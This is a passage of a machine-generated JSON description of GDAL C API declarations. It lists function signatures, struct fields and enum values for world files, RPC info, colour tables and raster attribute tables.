"parameter", "name": "nBitCount", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nStepCount", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALLoadWorldFile", "ns": 0, "location": "/usr/include/gdal/gdal.h:970:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALReadWorldFile", "ns": 0, "location": "/usr/include/gdal/gdal.h:971:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALWriteWorldFile", "ns": 0, "location": "/usr/include/gdal/gdal.h:973:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALLoadTabFile", "ns": 0, "location": "/usr/include/gdal/gdal.h:975:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": "GDAL_GCP" } } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALReadTabFile", "ns": 0, "location": "/usr/include/gdal/gdal.h:977:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": "GDAL_GCP" } } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALLoadOziMapFile", "ns": 0, "location": "/usr/include/gdal/gdal.h:979:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": "GDAL_GCP" } } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALReadOziMapFile", "ns": 0, "location": "/usr/include/gdal/gdal.h:981:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": "GDAL_GCP" } } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALDecToDMS", "ns": 0, "location": "/usr/include/gdal/gdal.h:984:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "GDALPackedDMSToDec", "ns": 0, "location": "/usr/include/gdal/gdal.h:985:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "GDALDecToPackedDMS", "ns": 0, "location": "/usr/include/gdal/gdal.h:986:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "GDALRPCInfo", "location": "/usr/include/gdal/gdal.h:1035:3", "type": { "tag": "struct", "ns": 0, "name": "", "id": 90, "location": "/usr/include/gdal/gdal.h:1012:9", "bit-size": 6016, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "dfLINE_OFF", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfSAMP_OFF", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfLAT_OFF", "bit-offset": 128, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfLONG_OFF", "bit-offset": 192, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfHEIGHT_OFF", "bit-offset": 256, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfLINE_SCALE", "bit-offset": 320, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfSAMP_SCALE", "bit-offset": 384, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfLAT_SCALE", "bit-offset": 448, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfLONG_SCALE", "bit-offset": 512, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfHEIGHT_SCALE", "bit-offset": 576, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "adfLINE_NUM_COEFF", "bit-offset": 640, "bit-size": 1280, "bit-alignment": 64, "type": { "tag": ":array", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "size": 20 } }, { "tag": "field", "name": "adfLINE_DEN_COEFF", "bit-offset": 1920, "bit-size": 1280, "bit-alignment": 64, "type": { "tag": ":array", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "size": 20 } }, { "tag": "field", "name": "adfSAMP_NUM_COEFF", "bit-offset": 3200, "bit-size": 1280, "bit-alignment": 64, "type": { "tag": ":array", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "size": 20 } }, { "tag": "field", "name": "adfSAMP_DEN_COEFF", "bit-offset": 4480, "bit-size": 1280, "bit-alignment": 64, "type": { "tag": ":array", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 }, "size": 20 } }, { "tag": "field", "name": "dfMIN_LONG", "bit-offset": 5760, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfMIN_LAT", "bit-offset": 5824, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfMAX_LONG", "bit-offset": 5888, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "dfMAX_LAT", "bit-offset": 5952, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }] } }, { "tag": "function", "name": "GDALExtractRPCInfo", "ns": 0, "location": "/usr/include/gdal/gdal.h:1037:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "CSLConstList" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "GDALRPCInfo" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "GDALColorEntry", "location": "/usr/include/gdal/gdal.h:1057:3", "type": { "tag": "struct", "ns": 0, "name": "", "id": 91, "location": "/usr/include/gdal/gdal.h:1044:9", "bit-size": 64, "bit-alignment": 16, "fields": [{ "tag": "field", "name": "c1", "bit-offset": 0, "bit-size": 16, "bit-alignment": 16, "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "field", "name": "c2", "bit-offset": 16, "bit-size": 16, "bit-alignment": 16, "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "field", "name": "c3", "bit-offset": 32, "bit-size": 16, "bit-alignment": 16, "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "field", "name": "c4", "bit-offset": 48, "bit-size": 16, "bit-alignment": 16, "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }] } }, { "tag": "function", "name": "GDALCreateColorTable", "ns": 0, "location": "/usr/include/gdal/gdal.h:1059:37", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALPaletteInterp" } }], "return-type": { "tag": "GDALColorTableH" } }, { "tag": "function", "name": "GDALDestroyColorTable", "ns": 0, "location": "/usr/include/gdal/gdal.h:1060:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALColorTableH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALCloneColorTable", "ns": 0, "location": "/usr/include/gdal/gdal.h:1061:37", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALColorTableH" } }], "return-type": { "tag": "GDALColorTableH" } }, { "tag": "function", "name": "GDALGetPaletteInterpretation", "ns": 0, "location": "/usr/include/gdal/gdal.h:1062:39", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALColorTableH" } }], "return-type": { "tag": "GDALPaletteInterp" } }, { "tag": "function", "name": "GDALGetColorEntryCount", "ns": 0, "location": "/usr/include/gdal/gdal.h:1063:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALColorTableH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALGetColorEntry", "ns": 0, "location": "/usr/include/gdal/gdal.h:1064:44", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALColorTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": "GDALColorEntry" } } }, { "tag": "function", "name": "GDALGetColorEntryAsRGB", "ns": 0, "location": "/usr/include/gdal/gdal.h:1065:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALColorTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "GDALColorEntry" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALSetColorEntry", "ns": 0, "location": "/usr/include/gdal/gdal.h:1066:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALColorTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "GDALColorEntry" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALCreateColorRamp", "ns": 0, "location": "/usr/include/gdal/gdal.h:1067:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hTable", "type": { "tag": "GDALColorTableH" } }, { "tag": "parameter", "name": "nStartIndex", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "psStartColor", "type": { "tag": ":pointer", "type": { "tag": "GDALColorEntry" } } }, { "tag": "parameter", "name": "nEndIndex", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "psEndColor", "type": { "tag": ":pointer", "type": { "tag": "GDALColorEntry" } } }], "return-type": { "tag": ":void" } }, { "tag": "enum", "ns": 0, "name": "", "id": 92, "location": "/usr/include/gdal/gdal.h:1076:9", "fields": [{ "tag": "field", "name": "GFT_Integer", "value": 0 }, { "tag": "field", "name": "GFT_Real", "value": 1 }, { "tag": "field", "name": "GFT_String", "value": 2 }] }, { "tag": "typedef", "ns": 0, "name": "GDALRATFieldType", "location": "/usr/include/gdal/gdal.h:1080:3", "type": { "tag": ":enum", "name": "", "id": 92 } }, { "tag": "enum", "ns": 0, "name": "", "id": 93, "location": "/usr/include/gdal/gdal.h:1083:9", "fields": [{ "tag": "field", "name": "GFU_Generic", "value": 0 }, { "tag": "field", "name": "GFU_PixelCount", "value": 1 }, { "tag": "field", "name": "GFU_Name", "value": 2 }, { "tag": "field", "name": "GFU_Min", "value": 3 }, { "tag": "field", "name": "GFU_Max", "value": 4 }, { "tag": "field", "name": "GFU_MinMax", "value": 5 }, { "tag": "field", "name": "GFU_Red", "value": 6 }, { "tag": "field", "name": "GFU_Green", "value": 7 }, { "tag": "field", "name": "GFU_Blue", "value": 8 }, { "tag": "field", "name": "GFU_Alpha", "value": 9 }, { "tag": "field", "name": "GFU_RedMin", "value": 10 }, { "tag": "field", "name": "GFU_GreenMin", "value": 11 }, { "tag": "field", "name": "GFU_BlueMin", "value": 12 }, { "tag": "field", "name": "GFU_AlphaMin", "value": 13 }, { "tag": "field", "name": "GFU_RedMax", "value": 14 }, { "tag": "field", "name": "GFU_GreenMax", "value": 15 }, { "tag": "field", "name": "GFU_BlueMax", "value": 16 }, { "tag": "field", "name": "GFU_AlphaMax", "value": 17 }, { "tag": "field", "name": "GFU_MaxCount", "value": 18 }] }, { "tag": "typedef", "ns": 0, "name": "GDALRATFieldUsage", "location": "/usr/include/gdal/gdal.h:1103:3", "type": { "tag": ":enum", "name": "", "id": 93 } }, { "tag": "enum", "ns": 0, "name": "", "id": 94, "location": "/usr/include/gdal/gdal.h:1108:9", "fields": [{ "tag": "field", "name": "GRTT_THEMATIC", "value": 0 }, { "tag": "field", "name": "GRTT_ATHEMATIC", "value": 1 }] }, { "tag": "typedef", "ns": 0, "name": "GDALRATTableType", "location": "/usr/include/gdal/gdal.h:1111:3", "type": { "tag": ":enum", "name": "", "id": 94 } }, { "tag": "function", "name": "GDALCreateRasterAttributeTable", "ns": 0, "location": "/usr/include/gdal/gdal.h:1114:44", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "function", "name": "GDALDestroyRasterAttributeTable", "ns": 0, "location": "/usr/include/gdal/gdal.h:1116:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALRATGetColumnCount", "ns": 0, "location": "/usr/include/gdal/gdal.h:1119:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALRATGetNameOfCol", "ns": 0, "location": "/usr/include/gdal/gdal.h:1121:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "GDALRATGetUsageOfCol", "ns": 0, "location": "/usr/include/gdal/gdal.h:1123:39", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "GDALRATFieldUsage" } }, { "tag": "function", "name": "GDALRATGetTypeOfCol", "ns": 0, "location": "/usr/include/gdal/gdal.h:1125:38", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "GDALRATFieldType" } }, { "tag": "function", "name": "GDALRATGetColOfUsage", "ns": 0, "location": "/usr/include/gdal/gdal.h:1128:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALRATFieldUsage" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALRATGetRowCount", "ns": 0, "location": "/usr/include/gdal/gdal.h:1130:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALRATGetValueAsString", "ns": 0, "location": "/usr/include/gdal/gdal.h:1132:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "GDALRATGetValueAsInt", "ns": 0, "location": "/usr/include/gdal/gdal.h:1134:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALRATGetValueAsDouble", "ns": 0, "location": "/usr/include/gdal/gdal.h:1136:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "GDALRATSetValueAsString", "ns": 0, "location": "/usr/include/gdal/gdal.h:1139:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALRATSetValueAsInt", "ns": 0, "location": "/usr/include/gdal/gdal.h:1141:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALRATSetValueAsDouble", "ns": 0, "location": "/usr/include/gdal/gdal.h:1143:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALRATChangesAreWrittenToFile", "ns": 0, "location": "/usr/include/gdal/gdal.h:1146:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hRAT", "type": { "tag": "GDALRasterAttributeTableH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALRATValuesIOAsDouble", "ns": 0, "location": "/usr/include/gdal/gdal.h:1148:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hRAT", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "eRWFlag", "type": { "tag": "GDALRWFlag" } }, { "tag": "parameter", "name": "iField", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "iStartRow", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "iLength", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pdfData", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALRATValuesIOAsInteger", "ns": 0, "location": "/usr/include/gdal/gdal.h:1150:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hRAT", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "eRWFlag", "type": { "tag": "GDALRWFlag" } }, { "tag": "parameter", "name": "iField", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "iStartRow", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "iLength", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pnData", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALRATValuesIOAsString", "ns": 0, "location": "/usr/include/gdal/gdal.h:1152:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hRAT", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "eRWFlag", "type": { "tag": "GDALRWFlag" } }, { "tag": "parameter", "name": "iField", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "iStartRow", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "iLength", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "papszStrList", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALRATSetRowCount", "ns": 0, "location": "/usr/include/gdal/gdal.h:1155:26", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "GDALRATCreateColumn", "ns": 0, "location": "/usr/include/gdal/gdal.h:1157:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALRATFieldType" } }, { "tag": "parameter", "name": "", "type": { "tag": "GDALRATFieldUsage" } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALRATSetLinearBinning", "ns": 0, "location": "/usr/include/gdal/gdal.h:1161:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALRATGetLinearBinning", "ns": 0, "location": "/usr/include/gdal/gdal.h:1163:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "GDALRATSetTableType", "ns": 0, "location": "/usr/include/gdal/gdal.h:1165:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hRAT", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "eInTableType", "type": { "tag": "GDALRATTableType" } }], "return-type": { "tag": "CPLErr" } }, { "tag": "function", "name": "GDALRATGetTableType", "ns": 0, "location": "/usr/include/gdal/gdal.h:1167:38", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hRAT", "type": { "tag": "GDALRasterAttributeTableH" } }], "return-type": { "tag": "GDALRATTableType" } }, { "tag": "function", "name": "GDALRATInitializeFromColorTable", "ns": 0, "location": "/usr/include/gdal/gdal.h:1168:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "GDALRasterAttributeTableH" } }, { "tag": "parameter", "name": "", 